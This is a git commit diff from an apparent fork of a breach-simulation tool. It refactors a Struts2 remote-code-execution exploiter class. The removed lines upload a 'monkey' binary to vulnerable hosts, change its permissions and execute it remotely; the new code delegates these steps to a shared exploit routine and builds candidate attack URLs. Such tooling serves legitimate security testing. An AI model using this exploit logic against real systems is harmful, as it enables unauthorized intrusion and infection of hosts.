forked from p15670423/monkey
Struts2 refactored to use default_exploit_host function
This commit is contained in:
parent
6cb058eb1d
commit
9ef44ef71f
|
@ -10,7 +10,7 @@ import re
|
|||
|
||||
import logging
|
||||
from web_rce import WebRCE
|
||||
import copy
|
||||
from posixpath import join
|
||||
|
||||
__author__ = "VakarisZ"
|
||||
|
||||
|
@ -23,45 +23,36 @@ class Struts2Exploiter(WebRCE):
|
|||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
|
||||
def __init__(self, host):
|
||||
super(Struts2Exploiter, self).__init__(host)
|
||||
super(Struts2Exploiter, self).__init__(host, None)
|
||||
|
||||
def exploit_host(self):
|
||||
# Get open ports
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = self.build_potential_urls(ports)
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
# Get full URL
|
||||
url = self.get_redirected(url)
|
||||
if self.check_if_exploitable(url):
|
||||
vulnerable_urls.append(url)
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
return self.default_exploit_host(dropper=True)
|
||||
|
||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not self.set_host_arch(vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
data = self.upload_monkey(vulnerable_urls[0])
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] is False:
|
||||
return False
|
||||
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
def build_potential_urls(self, ports, extensions=None):
|
||||
"""
|
||||
We need to override this method to get redirected url's
|
||||
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
|
||||
Eg. ports: [[80, False], [443, True]]
|
||||
:param extensions: What subdirectories to scan. www.domain.com[/extension]
|
||||
:return: Array of url's to try and attack
|
||||
"""
|
||||
url_list = []
|
||||
if extensions:
|
||||
extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
|
||||
else:
|
||||
extensions = [""]
|
||||
for port in ports:
|
||||
for extension in extensions:
|
||||
if port[1]:
|
||||
protocol = "https"
|
||||
else:
|
||||
protocol = "http"
|
||||
url = join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)
|
||||
redirected_url = self.get_redirected(url)
|
||||
url_list.append(redirected_url)
|
||||
if not url_list:
|
||||
LOG.info("No attack url's were built")
|
||||
return url_list
|
||||
|
||||
@staticmethod
|
||||
def get_redirected(url):
|
||||
|
|
Loading…
Reference in New Issue